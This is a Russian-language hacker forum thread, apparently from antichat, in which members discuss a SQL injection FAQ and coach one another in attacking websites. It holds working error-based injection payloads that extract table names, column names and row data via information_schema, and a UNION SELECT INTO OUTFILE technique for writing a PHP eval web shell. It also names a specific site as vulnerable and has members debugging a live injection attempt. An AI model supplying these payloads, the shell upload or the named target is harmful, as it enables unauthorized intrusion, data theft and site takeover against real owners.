Авторские статьи SQL injection полный FAQ

Discussion in 'Статьи' started by Dr.Z3r0, 7 Jul 2007.

  1. KizZz

    KizZz New Member

    Joined:
    15 May 2010
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    я прочитал вроде понял)) но не понял одного ))) как её найти? что надо писать и где? и как? помогите бо реально туп !
     
  2. Boa

    Boa Member

    Joined:
    30 May 2010
    Messages:
    86
    Likes Received:
    29
    Reputations:
    18
    Допустим, ты ломаешь сайт qwerty.ru. Попал ты на страницу qwerty.ru/news.php?id=123. И чтобы проверить есть ли уязвимость, нужно подставить к значению id какой нибудь левый символ, например, кавычку: qwerty.ru/news.php?id=123'. Можно еще попробовать так: qwerty.ru/news.php?id=124-1. Как известно, 124-1=123 :) Если информация при таком URL выводится та же самая, что и при id=123, то практически наверняка уязвимость имеет место быть.
     
    #142 Boa, 16 Jun 2010
    Last edited: 16 Jun 2010
  3. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    942
    Likes Received:
    428
    Reputations:
    139
    Глупости. Нe лeвый символ, a тот, которъй может вызвать синтaксичeскую ошибку в зaпросe.
     
  4. Boa

    Boa Member

    Joined:
    30 May 2010
    Messages:
    86
    Likes Received:
    29
    Reputations:
    18
    Ins3t, я именно такие символы и обозвал левыми)
     
  5. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    Пожалуйста, дайте сайт, уязвимый, где именно эти примеры работают!
     
  6. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    Кому может пригодится, ссылка на уязвимый сайт - http://www.biochemistry-imm.org/
    Другие подобные уязвимые сайты, можно найти в этой теме.
     
  7. Boa

    Boa Member

    Joined:
    30 May 2010
    Messages:
    86
    Likes Received:
    29
    Reputations:
    18
    Не очень понял про работу с файлами.
    Например, мне нужно залить шелл при помощи скул инъекции. Делать надо такой запрос:
    http://site.ru/index.php?id=5+union+select+1,2,что-то,3,4,5,6+into+outfile+shell.php
    ?

    Вместо что-то, кстати, что можно подставить, чтобы загрузить шелл навроде wso?
     
  8. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    https://forum.antichat.ru/thread104591.html
    а я думал ты хакирь
     
    _________________________
    #148 Дирижабль, 18 Aug 2010
    Last edited: 18 Aug 2010
    1 person likes this.
  9. Boa

    Boa Member

    Joined:
    30 May 2010
    Messages:
    86
    Likes Received:
    29
    Reputations:
    18
    Сюда можно подставлять что-то невыразимо громадное, типо того же wso?
     
  10. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    емае...пример '<?php eval($_GET['eval']) ?>'
     
    _________________________
  11. stragger

    stragger New Member

    Joined:
    29 Jul 2010
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Можно ли с помощью отчёта об ошибках выводить имена таблиц из Information_schema?
     
  12. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    330
    Likes Received:
    129
    Reputations:
    54
    Попробуй так:
    +or+(select+count(*)from(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+version()),1,64),floor(rand(0)*2)))+--+

    Если неполучится стучи в асю, помогу - 4000840.
     
  13. so_newbie

    so_newbie Member

    Joined:
    6 Jul 2010
    Messages:
    33
    Likes Received:
    14
    Reputations:
    9
    вывод таблиц
    Code:
    http://site.com/news?id=-1+or+(1,1)=(select+count(0),concat((select+table_name+limit+0,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)--+
    
    вывод колонок
    Code:
    http://site.com/news?id=-1+or+(1,1)=(select+count(0),concat((select+column_name+from+%table_name%+limit+0,1),floor(rand(0)*2))+from+information_schema.columns+group+by+2)--+
    
    вывод значений из таблицы
    Code:
    http://site.com/news?id=-1+or+(1,1)=(select+count(0),concat((select+concat_ws(0x3a,%column_names%)+from+%table_name%+limit+0,1),floor(rand(0)*2))+from+information_schema.tables++group+by+2)--+
    
     
  14. Welemir

    Welemir Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    229
    Likes Received:
    11
    Reputations:
    -4

    Гет запрос ограничение будет,да и любой скрипт всё равно подставить не получится: ).Нужно тогда и запрос изменять terminated by,enclosed by и т.д.
    Эти же операторы вряд ли были рассчитаны на гет селект запросы ))).Для работы с файлами ещё понятно...)
     
  15. miako

    miako Member

    Joined:
    20 Jan 2010
    Messages:
    154
    Likes Received:
    13
    Reputations:
    5
    Как побороть ЧПУ? Куда подставлять параметры? Инпутов нет.
     
  16. Darth Padla

    Darth Padla Member

    Joined:
    21 Jun 2010
    Messages:
    141
    Likes Received:
    25
    Reputations:
    8
    В пункт 4.2 нужно добавить БОЛЬШИМИ БУКВАМИ что операторы в hex не будут работать
     
  17. HBWS

    HBWS Member

    Joined:
    26 Nov 2010
    Messages:
    226
    Likes Received:
    22
    Reputations:
    0
    Самое полное руководство, из всех что видел. Спасибо.
     
  18. Greenday

    Greenday New Member

    Joined:
    11 Nov 2010
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Отличная статья.А где еще можно найти и скачать уязвимые скрипты для изучения уязвимости?
     
  19. FreShBY

    FreShBY Banned

    Joined:
    3 May 2009
    Messages:
    24
    Likes Received:
    3
    Reputations:
    0
    Есть страница
    http://test/test/test.html

    Попытался сделать инъекцию и вот что вышло
    http://test/test/1'+UNION+SELECT+1,+2+--

    Результат:
    Code:
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION+SELECT+1,+2+--' LIMIT 0,1' at line 1
    query=SELECT * FROM structure WHERE p_ID='933' AND url='1'+UNION+SELECT+1,+2+--' LIMIT 0,1
    Что я сделал не так и как "добить" эту дырку?
     
  20. [RedSky]

    [RedSky] Banned

    Joined:
    4 May 2011
    Messages:
    10
    Likes Received:
    11
    Reputations:
    10
    Во-первых, коментарием "+--" ты кавычку не отсечешь.
    Во-вторых, по ошибке видно данные в запрос попадают напрямую, о чем свидетельствуют плюсы в запросе, попробуй замену пробельного символа + т.к. у тебя выводится и ошибки майскула, то не составляет труда крутить как еррор-байсед.
     
Loading...
Similar Threads - injection полный
  1. afonn
    Replies:
    4
    Views:
    6,251
  2. eclipse
    Replies:
    0
    Views:
    6,500
  3. Boa
    Replies:
    78
    Views:
    62,267
  4. aka_zver
    Replies:
    2
    Views:
    10,449